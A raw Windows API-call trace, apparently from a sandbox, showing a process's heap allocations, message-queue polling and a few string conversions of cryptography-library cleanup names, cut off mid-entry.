[0151.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0151.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0151.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0151.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0151.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0151.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0151.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0151.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0151.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0151.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0151.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0151.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0151.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0151.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0151.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0151.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0151.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0151.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0151.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0151.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9908) returned 0x2f30b40 [0151.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0151.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0151.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0151.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0151.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0151.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0151.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0151.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0151.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0151.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0151.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0151.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0151.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9908) returned 0x2f3a450 [0151.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f30b40 | out: hHeap=0x970000) returned 1 [0151.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0151.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0151.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0151.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0151.830] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0151.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0151.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0151.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0151.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0151.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0151.830] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0151.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0151.830] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0151.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0151.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0151.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0151.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0151.830] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0151.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0151.830] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0151.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0151.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0151.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0151.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0151.831] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0151.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0151.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0151.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0151.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0151.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0151.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0151.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0151.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0151.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0151.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0151.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0151.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0151.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0151.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0151.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0151.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0151.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0151.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0151.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0151.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0151.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0151.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0151.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0151.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0151.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0151.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0151.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0151.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0151.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0151.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0151.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0151.832] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0151.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0151.832] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0151.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0151.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0151.832] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0151.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0151.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0151.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0151.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0151.833] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0151.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0151.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0151.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0151.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0151.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0151.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0151.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0151.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0151.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0151.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0151.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0151.833] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0151.833] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0151.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0151.834] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0151.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0151.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0151.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0151.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0151.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0151.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0151.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0151.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0151.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0151.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0151.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9908) returned 0x2f30b40 [0151.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0151.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0151.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9908) returned 0x2f43d60 [0151.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0151.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0151.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f30b40 | out: hHeap=0x970000) returned 1 [0151.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0151.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0151.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0151.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0151.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0151.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9908) returned 0x2f30b40 [0151.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f43d60 | out: hHeap=0x970000) returned 1 [0151.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0151.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0151.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9908) returned 0x2f43d60 [0151.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f30b40 | out: hHeap=0x970000) returned 1 [0151.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0151.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0151.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0151.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0151.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0151.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0151.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0151.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0151.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0151.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0151.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0151.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0151.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0151.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0151.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0151.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0151.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0151.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0151.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0151.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0151.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0151.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0151.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0151.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0151.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0151.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0151.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0151.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0151.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0151.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0151.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0151.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0151.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0151.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f27230 | out: hHeap=0x970000) returned 1 [0151.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0151.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0151.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0151.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0151.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0151.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0151.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0151.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0151.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0151.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0151.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0151.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0151.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0151.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0151.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0151.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0151.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0151.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1d920 | out: hHeap=0x970000) returned 1 [0151.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0151.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0151.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0151.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0151.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0151.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3a450 | out: hHeap=0x970000) returned 1 [0151.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0151.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0151.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0151.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0151.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0151.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0151.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0151.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0151.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0151.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0151.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0151.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0151.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0151.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0151.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0151.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0151.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0151.844] HeapFree (in: 